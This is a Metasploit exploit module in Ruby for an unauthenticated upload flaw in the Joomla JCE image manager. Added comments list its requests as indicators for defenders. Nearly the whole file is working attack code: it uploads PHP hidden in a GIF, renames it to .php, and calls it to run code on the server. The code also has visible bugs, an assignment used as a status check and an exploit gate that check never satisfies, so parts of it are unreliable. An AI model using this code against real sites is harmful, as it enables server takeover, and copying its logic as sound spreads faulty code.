##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Joomla! JCE "imgmanager" plugin: unauthenticated file upload leading to PHP execution.
#
# Request sequence as implemented in this file (every value below is taken from the
# code, so it doubles as the list of observable indicators a defender can alert on):
#   1. GET  <TARGETURI>/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
#      and read the version out of "<title>Image Manager : ...<" (get_version / check).
#   2. POST the same path with the extra query parameter method=form and a
#      multipart/form-data body whose "Filedata" part is "<name>.gif" (Content-Type
#      image/gif) starting with "GIF89aG" followed by a <?php ... ?> block (upload_gif).
#   3. POST the same path with header "X-Request: JSON" and the form body
#      json={"fn":"folderRename","args":["/<name>.gif","<name>.php"]} (renamed?).
#   4. GET  <TARGETURI>/images/stories/<name>.php to run the renamed file (call_payload).
# <name> is six random lowercase letters chosen per run (@payload_name).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata plus the single option TARGETURI (Joomla base path, default "/").
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in the JCE component for Joomla!, which
          could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
          fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
          request, a remote attacker could exploit this vulnerability to upload a malicious PHP
          script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
          system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
          1.5.26.
        },
        'Author' => [
          'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '74839'],
          ['EDB', '17734'],
          ['BID', '49338']
        ],
        'Payload' => {
          'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars' => "#",
          'Keys' => ['php']
        },
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [[ 'Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2012-08-02',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
      ]
    )
  end

  # Fetches the imgmanager plugin page and extracts the version from its <title>.
  #
  # Side effect: sets @uri_base and @vars_get_base, which upload_gif and renamed?
  # reuse, so this has to run before them (exploit reaches it through check).
  #
  # @return [String, nil] the captured version, or nil when there was no response,
  #   the status was not 200, or the title regexp did not match
  def get_version
    # check imgmanager version
    @uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base = {
      'option' => 'com_jce',
      'task' => 'plugin',
      'plugin' => 'imgmanager',
      'file' => 'imgmanager'
    }
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri' => @uri_base,
      'vars_get' => @vars_get_base,
      'method' => 'GET',
      'version' => '1.1'
    })

    version = nil
    if (res and res.code == 200)
      # String#match sets the last-match globals, so $1 below is the capture
      # from this regexp (nil when the title did not match).
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end

    return version
  end

  # Version-based check only; no state is changed on the target.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the reported version contains
  #   "1.5.7.1" optionally followed by a digit 0-4 (the regexp is unanchored),
  #   Safe otherwise (including when get_version returned nil)
  def check
    version = (get_version || '').to_s

    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the multipart upload (step 2 in the class comment). Requires @uri_base
  # and @vars_get_base from get_version. Sets @payload_name, which renamed?,
  # call_payload and exploit's cleanup registration all read.
  #
  # @return [Symbol] :access_denied if the response body contains "RESTRICTED",
  #   :abort if no response object came back, :success otherwise
  def upload_gif
    # add GIF header
    cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

    # Generate some random strings
    @payload_name = rand_text_alpha_lower(6)
    boundary = '-' * 27 + rand_text_numeric(11)

    # Query string: the base imgmanager parameters plus method=form.
    parms = { 'method' => 'form' }
    parms.merge!(@vars_get_base)

    # POST data
    # Note the two "Filedata" parts: an empty application/octet-stream one with an
    # empty filename, then the real image/gif part carrying cmd_php.
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

    data = post_data.to_s

    res = send_request_cgi({
      'uri' => @uri_base,
      'vars_get' => parms,
      'method' => 'POST',
      'version' => '1.1',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    # NOTE(review): "res.code = 200" is an assignment, not a comparison, so this
    # condition is true whenever res is non-nil regardless of the actual status;
    # the else branch is reached only when no response object exists.
    if (res and res.code = 200)
      return :access_denied if (res.body =~ /RESTRICTED/i)

      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end

    return :success
  end

  # Asks the imgmanager JSON interface to rename <name>.gif to <name>.php
  # (step 3 in the class comment). Success is judged from the HTTP status only;
  # the JSON reply body is not inspected.
  #
  # @return [Boolean] true on HTTP 200, false otherwise
  def renamed?
    # Rename the file from .gif to .php
    data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

    res = send_request_cgi(
      {
        'uri' => @uri_base,
        'vars_get' => @vars_get_base,
        'method' => 'POST',
        'version' => '1.1',
        'data' => data,
        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
        'headers' =>
        {
          'X-Request' => 'JSON'
        }
      }
    )
    if (res and res.code == 200)
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  # Requests images/stories/<name>.php under TARGETURI (step 4 in the class comment).
  # The "images/stories" location is assumed by the module to be where imgmanager
  # stored the upload; nothing here verifies it. The response is assigned but not
  # inspected, so the method's value is whatever send_request_cgi returned.
  def call_payload
    payload = "#{@payload_name}.php"
    print_status("Calling payload: #{payload}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'version' => '1.1'
    })
  end

  # Entry point: bails out unless check reports CheckCode::Vulnerable, then runs
  # upload -> rename -> cleanup registration -> request of the renamed file.
  def exploit
    return if not check == Exploit::CheckCode::Vulnerable

    if upload_gif == :success
      if renamed?
        # Only the bare filename is registered with FileDropper.
        # NOTE(review): confirm the cleanup resolves it against the directory the
        # uploaded file actually lives in; that is not visible from this module.
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end
  end
end